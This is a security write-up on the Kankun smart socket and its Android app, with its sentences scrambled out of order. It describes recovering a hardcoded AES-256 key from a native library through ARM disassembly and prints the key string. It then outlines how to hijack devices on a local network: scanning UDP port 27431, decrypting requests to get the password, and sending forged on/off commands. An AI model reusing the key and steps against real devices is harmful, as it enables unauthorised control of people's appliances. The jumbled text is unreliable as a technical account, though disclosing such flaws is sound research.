Konke mini k
In good faith we would like to mention the same person who goes by the handle: kankun hacker https plus. In effect r3 0x3e96 0x384e 0x28 0x770c which is where our key resides. The below instructions translate to r2 128 Left shift by : 2280 movs r2, #128 ; 0x80. Because of pipelining and THUMB mode while executing the add r3, pc instruction pc will point 4 bytes ahead of the address 0x384a i.e. Step 4 Device sends an Acknowledgement and Switches the device ON/OFF. 3842: 4b4e ldr r3, pc, #312 ; (397c EncryptData0x1a4 ). The EncryptData internally calls aes functions which means it is using AES encryption 000037d8 EncryptData : 37d8: b5f0 push r4, r5, r6, r7, lr 37da: 465f mov r7, fp 37dc: . 384a: 447b add r3, pc. Vulnerability Description The kankun smart socket device and the mobile app use a hardcoded AES 256 bit key to encrypt the commands and responses between the device and the app. If the user does not set any encryption password the string nopassword is used. So all you need to do is: nmap scan for UDP port 27431 on the network. Its a very good mix of technologies to hack around where you can sharpen your software as well as hardware exploitation skills and not to mention that exploiting IoT/smart devices. A quick strings output showed up the key along with other strings. Which means anyone on the local network can sniff the command packets. App Reversing We decompiled the app using using apktool. We previously saw that the app sends the commands as UDP broadcasts to port 27431. Technical details We performed our analysis on the Android App and the device. So, we had a starting point and straight away went after the encryption and below is the result. There is also an option of wan_phone and wan_device which we did not test. Extract the confirmation ID from the response Send the confirmation request to the device Receive the acknowledgement response The device has been successfully hijacked. Interestingly there is also a function called add which adds the two parameters and returns the result. The commands are Broadcasted on the network to UDP destination port 27431. The app has a native shared library libNDK_03.so which contains the encryption logic and the hard-coded key. Vulnerability: Hardcoded AES 256 bit key used in Kankun Smart socket and its mobile App. What if the user sets a password :O. A quick look at the IDA output shows that EncryptData and DecryptData are exported functions which means any native program can load libNDK_03 using dlopen and family and can use. The below code generates the memory address of the key string within the library. Decrypt the request received and extract the password. When you find the device note down its MAC address to be used in the request. 38be: 1c29 adds r1, r5, #0 38c0: f7fd fd84 bl 13cc aes_encrypt Now to find the key we look at the code of EncryptData. Introduction: The Internet of Things (IoT) space is very interesting as it encompasses hardware, mobile and cloud/web. An attacker on the local network can use the same key to encrypt and send unsolicited commands to the device and hijack it. The manufacturer of the device is www. BBh0 pointer is null pucOutputData too small fdsl;mewrjope456fds4fbvfnjwaugfo pucInputData dataLen is incorrect pucOutPutData is too small. An example of the communication protocol to Switch ON the device, assuming the MAC address of the device is de:ad:de:ad:de:ad, the password set by the user is secretpass and the. The user manual specifies the app to be used for the device http kk. The command and response for switching ON and OFF is a 4 step process. 397c: 0000 3e96 muleq r0, r6, lr Lets look at the code: The ldr instruction loads the value 0x3e96 in r3, which is the value at address 0x397c. Apk The smart socket has a newer version on the app on google play store which is also vulnerable https play. 39b6: 2380 movs r3, #128 ; 0x80 39b8: f7ff ff0e bl 37d8 EncryptData. There are two binaries in the device that use the key kkeps_off and kkeps_on Output of strings kkeps_off.